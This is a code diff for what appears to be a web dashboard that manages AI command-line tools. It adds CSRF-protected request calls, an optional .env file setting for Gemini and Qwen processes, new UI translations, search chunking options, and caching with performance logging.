@@ -451,7 +451,7 @@ async function cleanAllStorageConfirm() {
|
||||
}
|
||||
|
||||
try {
|
||||
const res = await fetch('/api/storage/clean', {
|
||||
const res = await csrfFetch('/api/storage/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ all: true })
|
||||
|
||||
@@ -568,7 +568,7 @@ async function executeSidebarUpdateTask(taskId) {
|
||||
}
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/update-claude-md', {
|
||||
const response = await csrfFetch('/api/update-claude-md', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
|
||||
@@ -261,6 +261,13 @@ const i18n = {
|
||||
'cli.wrapper': 'Wrapper',
|
||||
'cli.customClaudeSettings': 'Custom Claude CLI settings',
|
||||
'cli.updateFailed': 'Failed to update',
|
||||
|
||||
// CLI Tool Config - Environment File
|
||||
'cli.envFile': 'Environment File',
|
||||
'cli.envFileOptional': '(optional)',
|
||||
'cli.envFilePlaceholder': 'Path to .env file (e.g., ~/.gemini-env or C:/Users/xxx/.env)',
|
||||
'cli.envFileHint': 'Load environment variables (e.g., API keys) before CLI execution. Supports ~ for home directory.',
|
||||
'cli.envFileBrowse': 'Browse',
|
||||
|
||||
// CodexLens Configuration
|
||||
'codexlens.config': 'CodexLens Configuration',
|
||||
@@ -294,6 +301,7 @@ const i18n = {
|
||||
'codexlens.envGroup.reranker': 'Reranker Configuration',
|
||||
'codexlens.envGroup.concurrency': 'Concurrency Settings',
|
||||
'codexlens.envGroup.cascade': 'Cascade Search Settings',
|
||||
'codexlens.envGroup.chunking': 'Chunking Options',
|
||||
'codexlens.envGroup.llm': 'LLM Features',
|
||||
// Environment variable field labels
|
||||
'codexlens.envField.backend': 'Backend',
|
||||
@@ -313,6 +321,10 @@ const i18n = {
|
||||
'codexlens.envField.searchStrategy': 'Search Strategy',
|
||||
'codexlens.envField.coarseK': 'Coarse K (1st stage)',
|
||||
'codexlens.envField.fineK': 'Fine K (final)',
|
||||
'codexlens.envField.stripComments': 'Strip Comments',
|
||||
'codexlens.envField.stripDocstrings': 'Strip Docstrings',
|
||||
'codexlens.envField.testFilePenalty': 'Test File Penalty',
|
||||
'codexlens.envField.docstringWeight': 'Docstring Weight',
|
||||
'codexlens.usingApiReranker': 'Using API Reranker',
|
||||
'codexlens.currentModel': 'Current Model',
|
||||
'codexlens.localModels': 'Local Models',
|
||||
@@ -990,6 +1002,12 @@ const i18n = {
|
||||
'mcp.clickToEdit': 'Click to edit',
|
||||
'mcp.clickToViewDetails': 'Click to view details',
|
||||
|
||||
// Windows MCP Compatibility
|
||||
'mcp.windows.title': 'Windows Compatibility Warning',
|
||||
'mcp.windows.compatibilityWarning': 'The MCP server "{name}" uses "{command}" which requires "cmd /c" wrapper on Windows to work properly with Claude Code.',
|
||||
'mcp.windows.autoFix': 'Auto-fix (Recommended)',
|
||||
'mcp.windows.keepOriginal': 'Keep Original',
|
||||
|
||||
// Hook Manager
|
||||
'hook.projectHooks': 'Project Hooks',
|
||||
'hook.projectFile': '.claude/settings.json',
|
||||
@@ -2410,6 +2428,13 @@ const i18n = {
|
||||
'cli.wrapper': '封装',
|
||||
'cli.customClaudeSettings': '自定义 Claude CLI 配置',
|
||||
'cli.updateFailed': '更新失败',
|
||||
|
||||
// CLI 工具配置 - 环境文件
|
||||
'cli.envFile': '环境文件',
|
||||
'cli.envFileOptional': '(可选)',
|
||||
'cli.envFilePlaceholder': '.env 文件路径(如 ~/.gemini-env 或 C:/Users/xxx/.env)',
|
||||
'cli.envFileHint': '在 CLI 执行前加载环境变量(如 API 密钥)。支持 ~ 表示用户目录。',
|
||||
'cli.envFileBrowse': '浏览',
|
||||
|
||||
// CodexLens 配置
|
||||
'codexlens.config': 'CodexLens 配置',
|
||||
@@ -2443,6 +2468,7 @@ const i18n = {
|
||||
'codexlens.envGroup.reranker': '重排序配置',
|
||||
'codexlens.envGroup.concurrency': '并发设置',
|
||||
'codexlens.envGroup.cascade': '级联搜索设置',
|
||||
'codexlens.envGroup.chunking': '分块选项',
|
||||
'codexlens.envGroup.llm': 'LLM 功能',
|
||||
// 环境变量字段标签
|
||||
'codexlens.envField.backend': '后端',
|
||||
@@ -2462,6 +2488,10 @@ const i18n = {
|
||||
'codexlens.envField.searchStrategy': '搜索策略',
|
||||
'codexlens.envField.coarseK': '粗筛 K (第一阶段)',
|
||||
'codexlens.envField.fineK': '精筛 K (最终)',
|
||||
'codexlens.envField.stripComments': '去除注释',
|
||||
'codexlens.envField.stripDocstrings': '去除文档字符串',
|
||||
'codexlens.envField.testFilePenalty': '测试文件惩罚',
|
||||
'codexlens.envField.docstringWeight': '文档字符串权重',
|
||||
'codexlens.usingApiReranker': '使用 API 重排序',
|
||||
'codexlens.currentModel': '当前模型',
|
||||
'codexlens.localModels': '本地模型',
|
||||
@@ -3118,6 +3148,12 @@ const i18n = {
|
||||
'mcp.clickToEdit': '点击编辑',
|
||||
'mcp.clickToViewDetails': '点击查看详情',
|
||||
|
||||
// Windows MCP 兼容性
|
||||
'mcp.windows.title': 'Windows 兼容性警告',
|
||||
'mcp.windows.compatibilityWarning': 'MCP 服务器 "{name}" 使用的 "{command}" 命令需要在 Windows 上添加 "cmd /c" 包装才能与 Claude Code 正常工作。',
|
||||
'mcp.windows.autoFix': '自动修复(推荐)',
|
||||
'mcp.windows.keepOriginal': '保持原样',
|
||||
|
||||
// Hook Manager
|
||||
'hook.projectHooks': '项目钩子',
|
||||
'hook.projectFile': '.claude/settings.json',
|
||||
|
||||
@@ -523,6 +523,27 @@ function buildToolConfigModalContent(tool, config, models, status) {
|
||||
'</div>' +
|
||||
'</div>' +
|
||||
|
||||
// Environment File Section (only for builtin tools: gemini, qwen)
|
||||
(tool === 'gemini' || tool === 'qwen' ? (
|
||||
'<div class="tool-config-section">' +
|
||||
'<h4><i data-lucide="file-key" class="w-3.5 h-3.5"></i> ' + t('cli.envFile') + ' <span class="text-muted">' + t('cli.envFileOptional') + '</span></h4>' +
|
||||
'<div class="env-file-input-group">' +
|
||||
'<div class="env-file-input-row">' +
|
||||
'<input type="text" id="envFileInput" class="tool-config-input" ' +
|
||||
'placeholder="' + t('cli.envFilePlaceholder') + '" ' +
|
||||
'value="' + (config.envFile ? escapeHtml(config.envFile) : '') + '" />' +
|
||||
'<button type="button" class="btn-sm btn-outline" id="envFileBrowseBtn">' +
|
||||
'<i data-lucide="folder-open" class="w-3.5 h-3.5"></i> ' + t('cli.envFileBrowse') +
|
||||
'</button>' +
|
||||
'</div>' +
|
||||
'<p class="env-file-hint">' +
|
||||
'<i data-lucide="info" class="w-3 h-3"></i> ' +
|
||||
t('cli.envFileHint') +
|
||||
'</p>' +
|
||||
'</div>' +
|
||||
'</div>'
|
||||
) : '') +
|
||||
|
||||
// Footer
|
||||
'<div class="tool-config-footer">' +
|
||||
'<button class="btn btn-outline" onclick="closeModal()">' + t('common.cancel') + '</button>' +
|
||||
@@ -701,12 +722,23 @@ function initToolConfigModalEvents(tool, currentConfig, models) {
|
||||
return;
|
||||
}
|
||||
|
||||
// Get envFile value (only for gemini/qwen)
|
||||
var envFileInput = document.getElementById('envFileInput');
|
||||
var envFile = envFileInput ? envFileInput.value.trim() : '';
|
||||
|
||||
try {
|
||||
await updateCliToolConfig(tool, {
|
||||
var updateData = {
|
||||
primaryModel: primaryModel,
|
||||
secondaryModel: secondaryModel,
|
||||
tags: currentTags
|
||||
});
|
||||
};
|
||||
|
||||
// Only include envFile for gemini/qwen tools
|
||||
if (tool === 'gemini' || tool === 'qwen') {
|
||||
updateData.envFile = envFile || null;
|
||||
}
|
||||
|
||||
await updateCliToolConfig(tool, updateData);
|
||||
// Reload config to reflect changes
|
||||
await loadCliToolConfig();
|
||||
showRefreshToast('Configuration saved', 'success');
|
||||
@@ -719,6 +751,44 @@ function initToolConfigModalEvents(tool, currentConfig, models) {
|
||||
};
|
||||
}
|
||||
|
||||
// Environment file browse button (only for gemini/qwen)
|
||||
var envFileBrowseBtn = document.getElementById('envFileBrowseBtn');
|
||||
if (envFileBrowseBtn) {
|
||||
envFileBrowseBtn.onclick = async function() {
|
||||
try {
|
||||
// Use file dialog API if available
|
||||
var response = await fetch('/api/dialog/open-file', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
title: t('cli.envFile'),
|
||||
filters: [
|
||||
{ name: 'Environment Files', extensions: ['env'] },
|
||||
{ name: 'All Files', extensions: ['*'] }
|
||||
],
|
||||
defaultPath: ''
|
||||
})
|
||||
});
|
||||
|
||||
if (response.ok) {
|
||||
var data = await response.json();
|
||||
if (data.filePath) {
|
||||
var envFileInput = document.getElementById('envFileInput');
|
||||
if (envFileInput) {
|
||||
envFileInput.value = data.filePath;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Fallback: prompt user to enter path manually
|
||||
showRefreshToast('File dialog not available. Please enter path manually.', 'info');
|
||||
}
|
||||
} catch (err) {
|
||||
console.error('Failed to open file dialog:', err);
|
||||
showRefreshToast('File dialog not available. Please enter path manually.', 'info');
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
// Initialize lucide icons in modal
|
||||
if (window.lucide) lucide.createIcons();
|
||||
}
|
||||
@@ -2752,7 +2822,7 @@ async function installSemanticDeps() {
|
||||
'<div class="text-sm text-muted-foreground animate-pulse">' + t('codexlens.installingDeps') + '</div>';
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var response = await csrfFetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var result = await response.json();
|
||||
|
||||
if (result.success) {
|
||||
|
||||
@@ -72,6 +72,10 @@ function invalidateCache(key) {
|
||||
Object.values(CACHE_KEY_MAP).forEach(function(k) {
|
||||
window.cacheManager.invalidate(k);
|
||||
});
|
||||
// 重要:同时清理包含 CodexLens 状态的全局缓存
|
||||
// 这些缓存在 cli-status.js 中使用,包含 codexLens.ready 状态
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
}
|
||||
|
||||
@@ -788,6 +792,12 @@ function initCodexLensConfigEvents(currentConfig) {
|
||||
|
||||
if (result.success) {
|
||||
showRefreshToast(t('codexlens.configSaved'), 'success');
|
||||
|
||||
// Invalidate config cache to ensure fresh data on next load
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('codexlens-config');
|
||||
}
|
||||
|
||||
closeModal();
|
||||
|
||||
// Refresh CodexLens status
|
||||
@@ -1109,6 +1119,16 @@ var ENV_VAR_GROUPS = {
|
||||
'CODEXLENS_CASCADE_COARSE_K': { labelKey: 'codexlens.envField.coarseK', type: 'number', placeholder: '100', default: '100', settingsPath: 'cascade.coarse_k', min: 10, max: 500 },
|
||||
'CODEXLENS_CASCADE_FINE_K': { labelKey: 'codexlens.envField.fineK', type: 'number', placeholder: '10', default: '10', settingsPath: 'cascade.fine_k', min: 1, max: 100 }
|
||||
}
|
||||
},
|
||||
chunking: {
|
||||
labelKey: 'codexlens.envGroup.chunking',
|
||||
icon: 'scissors',
|
||||
vars: {
|
||||
'CHUNK_STRIP_COMMENTS': { labelKey: 'codexlens.envField.stripComments', type: 'select', options: ['true', 'false'], default: 'true', settingsPath: 'chunking.strip_comments' },
|
||||
'CHUNK_STRIP_DOCSTRINGS': { labelKey: 'codexlens.envField.stripDocstrings', type: 'select', options: ['true', 'false'], default: 'true', settingsPath: 'chunking.strip_docstrings' },
|
||||
'RERANKER_TEST_FILE_PENALTY': { labelKey: 'codexlens.envField.testFilePenalty', type: 'number', placeholder: '0.0', default: '0.0', settingsPath: 'reranker.test_file_penalty', min: 0, max: 1, step: 0.1 },
|
||||
'RERANKER_DOCSTRING_WEIGHT': { labelKey: 'codexlens.envField.docstringWeight', type: 'number', placeholder: '1.0', default: '1.0', settingsPath: 'reranker.docstring_weight', min: 0, max: 1, step: 0.1 }
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
@@ -3603,7 +3623,7 @@ async function initCodexLensIndex(indexType, embeddingModel, embeddingBackend, m
|
||||
// Install semantic dependencies first
|
||||
showRefreshToast(t('codexlens.installingDeps') || 'Installing semantic dependencies...', 'info');
|
||||
try {
|
||||
var installResponse = await fetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var installResponse = await csrfFetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var installResult = await installResponse.json();
|
||||
|
||||
if (!installResult.success) {
|
||||
@@ -5373,9 +5393,9 @@ function initCodexLensManagerPageEvents(currentConfig) {
|
||||
saveBtn.disabled = true;
|
||||
saveBtn.innerHTML = '<span class="animate-pulse">' + t('common.saving') + '</span>';
|
||||
try {
|
||||
var response = await fetch('/api/codexlens/config', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ index_dir: newIndexDir }) });
|
||||
var response = await csrfFetch('/api/codexlens/config', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ index_dir: newIndexDir }) });
|
||||
var result = await response.json();
|
||||
if (result.success) { showRefreshToast(t('codexlens.configSaved'), 'success'); renderCodexLensManager(); }
|
||||
if (result.success) { if (window.cacheManager) { window.cacheManager.invalidate('codexlens-config'); } showRefreshToast(t('codexlens.configSaved'), 'success'); renderCodexLensManager(); }
|
||||
else { showRefreshToast(t('common.saveFailed') + ': ' + result.error, 'error'); }
|
||||
} catch (err) { showRefreshToast(t('common.error') + ': ' + err.message, 'error'); }
|
||||
saveBtn.disabled = false;
|
||||
|
||||
@@ -338,6 +338,14 @@ function renderIssueCard(issue) {
|
||||
${t('issues.boundSolution') || 'Bound'}
|
||||
</span>
|
||||
` : ''}
|
||||
${issue.github_url ? `
|
||||
<a href="${issue.github_url}" target="_blank" rel="noopener noreferrer"
|
||||
class="flex items-center gap-1 text-muted-foreground hover:text-foreground transition-colors"
|
||||
onclick="event.stopPropagation()" title="View on GitHub">
|
||||
<i data-lucide="github" class="w-3.5 h-3.5"></i>
|
||||
${issue.github_number ? `#${issue.github_number}` : 'GitHub'}
|
||||
</a>
|
||||
` : ''}
|
||||
</div>
|
||||
</div>
|
||||
`;
|
||||
|
||||
@@ -1114,7 +1114,7 @@ async function deleteInsight(insightId) {
|
||||
if (!confirm(t('memory.confirmDeleteInsight'))) return;
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
var response = await csrfFetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
if (!response.ok) throw new Error('Failed to delete insight');
|
||||
|
||||
selectedInsight = null;
|
||||
|
||||
@@ -431,7 +431,7 @@ async function deletePromptInsight(insightId) {
|
||||
if (!confirm(isZh() ? '确定要删除这条洞察记录吗?' : 'Are you sure you want to delete this insight?')) return;
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
var response = await csrfFetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
if (!response.ok) throw new Error('Failed to delete insight');
|
||||
|
||||
selectedPromptInsight = null;
|
||||
|
||||
@@ -34,6 +34,11 @@ export interface ClaudeCliTool {
|
||||
* Used to lookup endpoint configuration in litellm-api-config.json
|
||||
*/
|
||||
id?: string;
|
||||
/**
|
||||
* Path to .env file for loading environment variables before CLI execution
|
||||
* Supports both absolute paths and paths relative to home directory (e.g., ~/.my-env)
|
||||
*/
|
||||
envFile?: string;
|
||||
}
|
||||
|
||||
export type CliToolName = 'gemini' | 'qwen' | 'codex' | 'claude' | 'opencode' | string;
|
||||
@@ -808,6 +813,7 @@ export function getToolConfig(projectDir: string, tool: string): {
|
||||
primaryModel: string;
|
||||
secondaryModel: string;
|
||||
tags?: string[];
|
||||
envFile?: string;
|
||||
} {
|
||||
const config = loadClaudeCliTools(projectDir);
|
||||
const toolConfig = config.tools[tool];
|
||||
@@ -826,7 +832,8 @@ export function getToolConfig(projectDir: string, tool: string): {
|
||||
enabled: toolConfig.enabled,
|
||||
primaryModel: toolConfig.primaryModel ?? '',
|
||||
secondaryModel: toolConfig.secondaryModel ?? '',
|
||||
tags: toolConfig.tags
|
||||
tags: toolConfig.tags,
|
||||
envFile: toolConfig.envFile
|
||||
};
|
||||
}
|
||||
|
||||
@@ -841,6 +848,7 @@ export function updateToolConfig(
|
||||
primaryModel: string;
|
||||
secondaryModel: string;
|
||||
tags: string[];
|
||||
envFile: string | null;
|
||||
}>
|
||||
): ClaudeCliToolsConfig {
|
||||
const config = loadClaudeCliTools(projectDir);
|
||||
@@ -858,6 +866,14 @@ export function updateToolConfig(
|
||||
if (updates.tags !== undefined) {
|
||||
config.tools[tool].tags = updates.tags;
|
||||
}
|
||||
// Handle envFile: set to undefined if null/empty, otherwise set value
|
||||
if (updates.envFile !== undefined) {
|
||||
if (updates.envFile === null || updates.envFile === '') {
|
||||
delete config.tools[tool].envFile;
|
||||
} else {
|
||||
config.tools[tool].envFile = updates.envFile;
|
||||
}
|
||||
}
|
||||
saveClaudeCliTools(projectDir, config);
|
||||
}
|
||||
|
||||
|
||||
@@ -6,6 +6,9 @@
|
||||
import { z } from 'zod';
|
||||
import type { ToolSchema, ToolResult } from '../types/tool.js';
|
||||
import { spawn, ChildProcess } from 'child_process';
|
||||
import * as fs from 'fs';
|
||||
import * as path from 'path';
|
||||
import * as os from 'os';
|
||||
import { validatePath } from '../utils/path-resolver.js';
|
||||
import { escapeWindowsArg } from '../utils/shell-escape.js';
|
||||
import { buildCommand, checkToolAvailability, clearToolCache, debugLog, errorLog, type NativeResumeConfig, type ToolAvailability } from './cli-executor-utils.js';
|
||||
@@ -82,7 +85,73 @@ import { findEndpointById } from '../config/litellm-api-config-manager.js';
|
||||
|
||||
// CLI Settings (CLI封装) integration
|
||||
import { loadEndpointSettings, getSettingsFilePath, findEndpoint } from '../config/cli-settings-manager.js';
|
||||
import { loadClaudeCliTools } from './claude-cli-tools.js';
|
||||
import { loadClaudeCliTools, getToolConfig } from './claude-cli-tools.js';
|
||||
|
||||
/**
|
||||
* Parse .env file content into key-value pairs
|
||||
* Supports: KEY=value, KEY="value", KEY='value', comments (#), empty lines
|
||||
*/
|
||||
function parseEnvFile(content: string): Record<string, string> {
|
||||
const env: Record<string, string> = {};
|
||||
const lines = content.split(/\r?\n/);
|
||||
|
||||
for (const line of lines) {
|
||||
// Skip empty lines and comments
|
||||
const trimmed = line.trim();
|
||||
if (!trimmed || trimmed.startsWith('#')) continue;
|
||||
|
||||
// Find first = sign
|
||||
const eqIndex = trimmed.indexOf('=');
|
||||
if (eqIndex === -1) continue;
|
||||
|
||||
const key = trimmed.substring(0, eqIndex).trim();
|
||||
let value = trimmed.substring(eqIndex + 1).trim();
|
||||
|
||||
// Remove surrounding quotes if present
|
||||
if ((value.startsWith('"') && value.endsWith('"')) ||
|
||||
(value.startsWith("'") && value.endsWith("'"))) {
|
||||
value = value.slice(1, -1);
|
||||
}
|
||||
|
||||
if (key) {
|
||||
env[key] = value;
|
||||
}
|
||||
}
|
||||
|
||||
return env;
|
||||
}
|
||||
|
||||
/**
|
||||
* Load environment variables from .env file
|
||||
* Supports ~ for home directory expansion
|
||||
*/
|
||||
function loadEnvFile(envFilePath: string): Record<string, string> {
|
||||
try {
|
||||
// Expand ~ to home directory
|
||||
let resolvedPath = envFilePath;
|
||||
if (resolvedPath.startsWith('~')) {
|
||||
resolvedPath = path.join(os.homedir(), resolvedPath.slice(1));
|
||||
}
|
||||
|
||||
// Resolve relative paths
|
||||
if (!path.isAbsolute(resolvedPath)) {
|
||||
resolvedPath = path.resolve(resolvedPath);
|
||||
}
|
||||
|
||||
if (!fs.existsSync(resolvedPath)) {
|
||||
debugLog('ENV_FILE', `Env file not found: ${resolvedPath}`);
|
||||
return {};
|
||||
}
|
||||
|
||||
const content = fs.readFileSync(resolvedPath, 'utf-8');
|
||||
const envVars = parseEnvFile(content);
|
||||
debugLog('ENV_FILE', `Loaded ${Object.keys(envVars).length} env vars from ${resolvedPath}`);
|
||||
return envVars;
|
||||
} catch (err) {
|
||||
errorLog('ENV_FILE', `Failed to load env file: ${envFilePath}`, err as Error);
|
||||
return {};
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Execute Claude CLI with custom settings file (CLI封装)
|
||||
@@ -746,6 +815,19 @@ async function executeCliTool(
|
||||
const commandToSpawn = isWindows ? escapeWindowsArg(command) : command;
|
||||
const argsToSpawn = isWindows ? args.map(escapeWindowsArg) : args;
|
||||
|
||||
// Load custom environment variables from envFile if configured (for gemini/qwen)
|
||||
const toolConfig = getToolConfig(workingDir, tool);
|
||||
let customEnv: Record<string, string> = {};
|
||||
if (toolConfig.envFile) {
|
||||
customEnv = loadEnvFile(toolConfig.envFile);
|
||||
}
|
||||
|
||||
// Merge custom env with process.env (custom env takes precedence)
|
||||
const spawnEnv = {
|
||||
...process.env,
|
||||
...customEnv
|
||||
};
|
||||
|
||||
debugLog('SPAWN', `Spawning process`, {
|
||||
command,
|
||||
args,
|
||||
@@ -754,13 +836,16 @@ async function executeCliTool(
|
||||
useStdin,
|
||||
platform: process.platform,
|
||||
fullCommand: `${command} ${args.join(' ')}`,
|
||||
hasCustomEnv: Object.keys(customEnv).length > 0,
|
||||
customEnvKeys: Object.keys(customEnv),
|
||||
...(isWindows ? { escapedCommand: commandToSpawn, escapedArgs: argsToSpawn, escapedFullCommand: `${commandToSpawn} ${argsToSpawn.join(' ')}` } : {})
|
||||
});
|
||||
|
||||
const child = spawn(commandToSpawn, argsToSpawn, {
|
||||
cwd: workingDir,
|
||||
shell: isWindows, // Enable shell on Windows for .cmd files
|
||||
stdio: [useStdin ? 'pipe' : 'ignore', 'pipe', 'pipe']
|
||||
stdio: [useStdin ? 'pipe' : 'ignore', 'pipe', 'pipe'],
|
||||
env: spawnEnv
|
||||
});
|
||||
|
||||
// Track current child process for cleanup on interruption
|
||||
@@ -1190,6 +1275,9 @@ export {
|
||||
* - api-endpoint: Check LiteLLM endpoint configuration exists
|
||||
*/
|
||||
export async function getCliToolsStatus(): Promise<Record<string, ToolAvailability>> {
|
||||
const funcStart = Date.now();
|
||||
debugLog('PERF', 'getCliToolsStatus START');
|
||||
|
||||
// Default built-in tools
|
||||
const builtInTools = ['gemini', 'qwen', 'codex', 'claude', 'opencode'];
|
||||
|
||||
@@ -1202,6 +1290,7 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
}
|
||||
let toolsInfo: ToolInfo[] = builtInTools.map(name => ({ name, type: 'builtin' }));
|
||||
|
||||
const configLoadStart = Date.now();
|
||||
try {
|
||||
// Dynamic import to avoid circular dependencies
|
||||
const { loadClaudeCliTools } = await import('./claude-cli-tools.js');
|
||||
@@ -1225,11 +1314,15 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
// Fallback to built-in tools if config load fails
|
||||
debugLog('cli-executor', `Using built-in tools (config load failed: ${(e as Error).message})`);
|
||||
}
|
||||
debugLog('PERF', `Config load: ${Date.now() - configLoadStart}ms, tools: ${toolsInfo.length}`);
|
||||
|
||||
const results: Record<string, ToolAvailability> = {};
|
||||
const toolTimings: Record<string, number> = {};
|
||||
|
||||
const checksStart = Date.now();
|
||||
await Promise.all(toolsInfo.map(async (toolInfo) => {
|
||||
const { name, type, enabled, id } = toolInfo;
|
||||
const toolStart = Date.now();
|
||||
|
||||
// Check availability based on tool type
|
||||
if (type === 'cli-wrapper') {
|
||||
@@ -1271,8 +1364,13 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
// For builtin: check system PATH availability
|
||||
results[name] = await checkToolAvailability(name);
|
||||
}
|
||||
|
||||
toolTimings[name] = Date.now() - toolStart;
|
||||
}));
|
||||
|
||||
debugLog('PERF', `Tool checks: ${Date.now() - checksStart}ms | Individual: ${JSON.stringify(toolTimings)}`);
|
||||
debugLog('PERF', `getCliToolsStatus TOTAL: ${Date.now() - funcStart}ms`);
|
||||
|
||||
return results;
|
||||
}
|
||||
|
||||
@@ -1520,6 +1618,9 @@ export type { PromptFormat, ConcatOptions } from './cli-prompt-builder.js';
|
||||
// Export utility functions and tool definition for backward compatibility
|
||||
export { executeCliTool, checkToolAvailability, clearToolCache };
|
||||
|
||||
// Export env file utilities for testing
|
||||
export { parseEnvFile, loadEnvFile };
|
||||
|
||||
// Export prompt concatenation utilities
|
||||
export { PromptConcatenator, createPromptConcatenator, buildPrompt, buildMultiTurnPrompt } from './cli-prompt-builder.js';
|
||||
|
||||
|
||||
@@ -49,6 +49,14 @@ interface VenvStatusCache {
|
||||
let venvStatusCache: VenvStatusCache | null = null;
|
||||
const VENV_STATUS_TTL = 5 * 60 * 1000; // 5 minutes TTL
|
||||
|
||||
// Semantic status cache with TTL (same as venv cache)
|
||||
interface SemanticStatusCache {
|
||||
status: SemanticStatus;
|
||||
timestamp: number;
|
||||
}
|
||||
let semanticStatusCache: SemanticStatusCache | null = null;
|
||||
const SEMANTIC_STATUS_TTL = 5 * 60 * 1000; // 5 minutes TTL
|
||||
|
||||
// Track running indexing process for cancellation
|
||||
let currentIndexingProcess: ReturnType<typeof spawn> | null = null;
|
||||
let currentIndexingAborted = false;
|
||||
@@ -147,8 +155,12 @@ function clearVenvStatusCache(): void {
|
||||
* @returns Ready status
|
||||
*/
|
||||
async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
const funcStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkVenvStatus START');
|
||||
|
||||
// Use cached result if available and not expired
|
||||
if (!force && venvStatusCache && (Date.now() - venvStatusCache.timestamp < VENV_STATUS_TTL)) {
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus CACHE HIT: ${Date.now() - funcStart}ms`);
|
||||
return venvStatusCache.status;
|
||||
}
|
||||
|
||||
@@ -156,6 +168,7 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
if (!existsSync(CODEXLENS_VENV)) {
|
||||
const result = { ready: false, error: 'Venv not found' };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus (no venv): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
@@ -163,12 +176,16 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
if (!existsSync(VENV_PYTHON)) {
|
||||
const result = { ready: false, error: 'Python executable not found in venv' };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus (no python): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// Check codexlens is importable
|
||||
// Check codexlens and core dependencies are importable
|
||||
const spawnStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkVenvStatus spawning Python...');
|
||||
|
||||
return new Promise((resolve) => {
|
||||
const child = spawn(VENV_PYTHON, ['-c', 'import codexlens; print(codexlens.__version__)'], {
|
||||
const child = spawn(VENV_PYTHON, ['-c', 'import codexlens; import watchdog; print(codexlens.__version__)'], {
|
||||
stdio: ['ignore', 'pipe', 'pipe'],
|
||||
timeout: 10000,
|
||||
});
|
||||
@@ -192,29 +209,54 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
}
|
||||
// Cache the result
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus Python spawn: ${Date.now() - spawnStart}ms | TOTAL: ${Date.now() - funcStart}ms | ready: ${result.ready}`);
|
||||
resolve(result);
|
||||
});
|
||||
|
||||
child.on('error', (err) => {
|
||||
const result = { ready: false, error: `Failed to check venv: ${err.message}` };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus ERROR: ${Date.now() - funcStart}ms`);
|
||||
resolve(result);
|
||||
});
|
||||
});
|
||||
}
|
||||
|
||||
/**
|
||||
* Clear semantic status cache (call after install/uninstall operations)
|
||||
*/
|
||||
function clearSemanticStatusCache(): void {
|
||||
semanticStatusCache = null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if semantic search dependencies are installed
|
||||
* @param force - Force refresh cache (default: false)
|
||||
* @returns Semantic status
|
||||
*/
|
||||
async function checkSemanticStatus(): Promise<SemanticStatus> {
|
||||
async function checkSemanticStatus(force = false): Promise<SemanticStatus> {
|
||||
const funcStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkSemanticStatus START');
|
||||
|
||||
// Use cached result if available and not expired
|
||||
if (!force && semanticStatusCache && (Date.now() - semanticStatusCache.timestamp < SEMANTIC_STATUS_TTL)) {
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus CACHE HIT: ${Date.now() - funcStart}ms`);
|
||||
return semanticStatusCache.status;
|
||||
}
|
||||
|
||||
// First check if CodexLens is installed
|
||||
const venvStatus = await checkVenvStatus();
|
||||
if (!venvStatus.ready) {
|
||||
return { available: false, error: 'CodexLens not installed' };
|
||||
const result: SemanticStatus = { available: false, error: 'CodexLens not installed' };
|
||||
semanticStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus (no venv): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// Check semantic module availability and accelerator info
|
||||
const spawnStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkSemanticStatus spawning Python...');
|
||||
|
||||
return new Promise((resolve) => {
|
||||
const checkCode = `
|
||||
import sys
|
||||
@@ -274,21 +316,31 @@ except Exception as e:
|
||||
const output = stdout.trim();
|
||||
try {
|
||||
